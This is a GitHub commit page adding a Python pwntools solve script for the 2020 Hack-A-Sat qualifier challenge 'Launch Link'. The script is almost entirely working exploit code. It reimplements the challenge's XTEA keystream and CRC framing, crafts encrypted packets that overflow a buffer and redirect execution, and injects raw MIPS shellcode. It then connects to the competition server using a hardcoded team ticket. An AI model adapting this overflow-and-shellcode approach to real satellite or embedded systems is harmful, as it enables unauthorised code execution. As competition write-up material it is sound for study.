Skip to content

Commit 7f5c1b9

Browse files
VoidMercyVoidMercy
authoredJun 2, 2020
launch link solve script
1 parent f2783b5 commit 7f5c1b9

File tree

1 file changed

+181
-0
lines changed

1 file changed

+181
-0
lines changed
 

‎2020/Hack-A-Sat-Quals/Launch-Link/solve.py

+181
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,181 @@
1+
from pwn import *
2+
import time
3+
import binascii
4+
import os
5+
6+
key = 0x2E92F6BA62F88828147C0E2AE361D32C
7+
iv1 = 0xCD4A05E8A0A3C10F
8+
iv2 = 0x4CD435388058EFC7
9+
10+
def key_get(key, idx):
11+
return (key >> (idx*32)) & 0xffffffff
12+
13+
def xtea_do(data, key):
14+
v0 = data & 0xffffffff
15+
v1 = data >> 32
16+
sum = 0x3e778b90
17+
while sum != 0x7cef1720:
18+
temp = (sum + key_get(key, sum & 3)) & 0xffffffff
19+
sum = (sum + 0x83e778b9) & 0xffffffff
20+
v0 = (v0 + (temp ^ (v1 << 4 ^ v1 >> 5) + v1)) & 0xffffffff
21+
v1 = (v1 + (sum + (key_get(key, (sum >> 9 & 0xc) // 4)) ^ (v0 * 0x10 ^ v0 >> 5) + v0)) & 0xffffffff
22+
return (v1 << 32) | v0
23+
24+
def get_keystream_resource_rll(key, length):
25+
global iv2
26+
stream = b""
27+
for i in range(length):
28+
select = i & 7
29+
if select == 0:
30+
iv2 = xtea_do(iv2, key)
31+
stream += bytes([(iv2 >> (select*8)) & 0xff])
32+
return stream
33+
34+
def get_keystream_mac_rll(key, length):
35+
global iv1
36+
stream = b""
37+
for i in range(length):
38+
select = i & 7
39+
if select == 0:
40+
iv1 = xtea_do(iv1, key)
41+
stream += bytes([(iv1 >> (select*8)) & 0xff])
42+
return stream
43+
44+
def encrypt_message(msg):
45+
stream = get_keystream_mac_rll(key, len(msg))
46+
ret = b""
47+
for i in range(len(msg)):
48+
ret += bytes([stream[i] ^ msg[i]])
49+
return ret
50+
51+
def decrypt_message(msg):
52+
stream = get_keystream_resource_rll(key, len(msg))
53+
ret = b""
54+
for i in range(len(msg)):
55+
ret += bytes([stream[i] ^ msg[i]])
56+
return ret
57+
58+
def crc16(data: bytes, poly=0x8408):
59+
data = bytearray(data)
60+
crc = 0xFFFF
61+
for b in data:
62+
cur_byte = 0xFF & b
63+
for _ in range(0, 8):
64+
if (crc & 0x0001) ^ (cur_byte & 0x0001):
65+
crc = (crc >> 1) ^ poly
66+
else:
67+
crc >>= 1
68+
cur_byte >>= 1
69+
crc = (~crc & 0xFFFF)
70+
crc = (crc << 8) | ((crc >> 8) & 0xFF)
71+
return crc & 0xFFFF
72+
73+
cur_size = 0x20
74+
75+
def set_size_block(size):
76+
global cur_size
77+
data = bytes([size])
78+
data += b"A"*(cur_size-4)
79+
payload = b"\x79" + p16(crc16(data)) + data
80+
cur_size = size
81+
return payload
82+
83+
def message_block(data):
84+
if len(data) < cur_size - 3:
85+
fill = cur_size - 3 - len(data)
86+
#data += cyclic(0x500)[:fill]
87+
data += b"A"*fill
88+
if data[0] == 0x73 or data[0] == 0xc3:
89+
data = bytes([data[0]]) + encrypt_message(data[1:])
90+
crcl = crc16(data)
91+
sice = b"\xe3" + p16(crcl) + data
92+
return sice
93+
94+
def reset():
95+
global cur_size
96+
data = b"A"*(cur_size-3)
97+
crcl = crc16(data)
98+
sice = b"\x13" + p16(crcl) + data
99+
cur_size = 0x20
100+
return sice
101+
102+
res = []
103+
res.append(set_size_block(0xc0))
104+
res.append(message_block(b"\x17" + b"\x70" + b"B"))
105+
#res.append(message_block(b"\xc3\x01" + p32(0x0) + b"\x20" + b"CCCCDDDDEEEEFFFF"))
106+
#res.append(reset())
107+
# 0x73 packet
108+
# uint16 sn
109+
#
110+
res.append(message_block(b"\x73\x0f\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
111+
res.append(message_block(b"\x73\x0e\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
112+
res.append(message_block(b"\x73\x0d\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
113+
res.append(message_block(b"\x73\x0c\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
114+
res.append(message_block(b"\x73\x0b\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
115+
res.append(message_block(b"\x73\x0a\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
116+
res.append(message_block(b"\x73\x09\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
117+
res.append(message_block(b"\x73\x08\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
118+
# 0x69696969 at a00fe778
119+
# jump to a00fe77c
120+
payload = b"\x73\x07\x80\x23\xfe" + b"\x00\x00\x00\x00"*4 + b"\xfe"*(0x10-5-4-4) + b"A"*0x1
121+
payload += p32(0xa0110308)
122+
#payload += b"\xFE\xFF\x00\x10" # shellchode
123+
payload += b"\x00\x00\x00\x00"*0x5
124+
payload += b"B"*(0xbd - len(payload))
125+
# ram buffer 1 - a0110304
126+
# jmp to a0110304 + 4
127+
res.append(message_block(payload))
128+
res.append(message_block(b"\x73\x06\x80\x23" + b"\xfe"*(0x10) + b"F"*0xa9))
129+
res.append(message_block(b"\x73\x05\x80\x23\xfe" + b"\xfe\xff\x00\x10" + b"\xfe"*(0x10-5) + b"G"*0xa9))
130+
res.append(message_block(b"\x73\x04\x80\x23" + b"\xfe"*0x10 + b"H"*0xa9))
131+
res.append(message_block(b"\x73\x03\x80\x23" + b"\xfe"*0x10 + b"A"*0xa9))
132+
res.append(message_block(b"\x73\x02\x80\x23" + b"\xfe"*0x10 + b"A"*0xa9))
133+
res.append(message_block(b"\x73\x01\x80\x23" + b"\xfe"*0x10 + b"A"*0xa9))
134+
#shellchode = b"\x00\x00\x00\x00" + b"\xFF\xFF\x00\x10"
135+
# bigly communication function = 0xbfc08cbc
136+
# global data buf 0xa00fecfc
137+
shellchode = b"\x00\x00\x07\x24\x04\x00\xA7\xAF\x04\x00\xA7\x8F\x20\x00\x09\x24\x17\x00\x27\x11\x00\x00\x00\x00\x00\x82\x02\x34\x00\x14\x02\x00\x00\x80\x42\x34\x80\x60\x07\x00\x20\x10\x4C\x00\x01\x00\xE7\x20\x04\x00\xA7\xAF\x00\x00\x43\x8C\x00\x00\xA3\xAF\x0F\xA0\x04\x34\x00\x24\x04\x00\xFC\xEC\x84\x34\x25\x28\xA0\x03\x26\x30\xC6\x00\x04\x00\x06\x24\xC0\xBF\x0B\x34\x00\x5C\x0B\x00\xBC\x8C\x6B\x35\x09\xF8\x60\x01\x00\x00\x00\x00\xE7\xFF\x00\x10\x00\x00\x00\x00"
138+
shellchode += b"\x00\x00\x00\x00"
139+
shellchode += b"\xFF\xFF\x00\x10"
140+
assert len(shellchode) < 0xb6
141+
shellchode += b"\x00"*(0xb6 - len(shellchode))
142+
res.append(message_block(b"\x73\x00\x80\x23\xfe\xfe\xfe" + shellchode))
143+
144+
145+
id1 = 0xef2c9fd1
146+
147+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
148+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
149+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
150+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
151+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
152+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
153+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
154+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
155+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
156+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
157+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
158+
#res.append(message_block(b"\xc3\x00\x00" + b"\x02"*0x10))
159+
#res.append(message_block(b"\x73" + encrypt_message(b"\x00\x00\x00")))
160+
#res.append(message_block(b"\xc3\x02" + p32(0x0) + b"\x20" + b"CCCCDDDDEEEEFFFF"))
161+
#res.append(message_block(b"\x17" + b"\x70" + b"B"))
162+
#res.append(message_block(b"\x73\x44\x44" + b"\x23"*0x30))
163+
#res.append(message_block(b"\xc3" + encrypt_message(b"\x01AAAAAAAA")))
164+
165+
#r = process(["./vmips_patched", "-o", "memsize=2097152", "challenge_patched.rom"])
166+
#r = process(["./vmips_patched", "-o", "memsize=2097152", "challenge.rom"])
167+
#r = process(["./vmips", "-o", "memsize=2097152", "challenge_patched.rom"])
168+
#r = process(["./vmips", "-o", "memsize=2097152", "challenge.rom"])
169+
r = remote("launchlink.satellitesabove.me",5065)
170+
r.recvline()
171+
r.sendline("ticket{xray25235hotel:GFNqIcfJ-QGCTwRRjocGhg_tpNDdbbbj8jgH99WUW1_AGkw6Dlo_uEn9jf6K3i7DYw}")
172+
time.sleep(1)
173+
"""
174+
r.recvuntil("*************RESET*************")
175+
r.recvline()
176+
r.recvline()
177+
"""
178+
for i in res:
179+
r.send(i)
180+
time.sleep(0.2)
181+
r.interactive()

0 commit comments

Comments
 (0)
Please sign in to comment.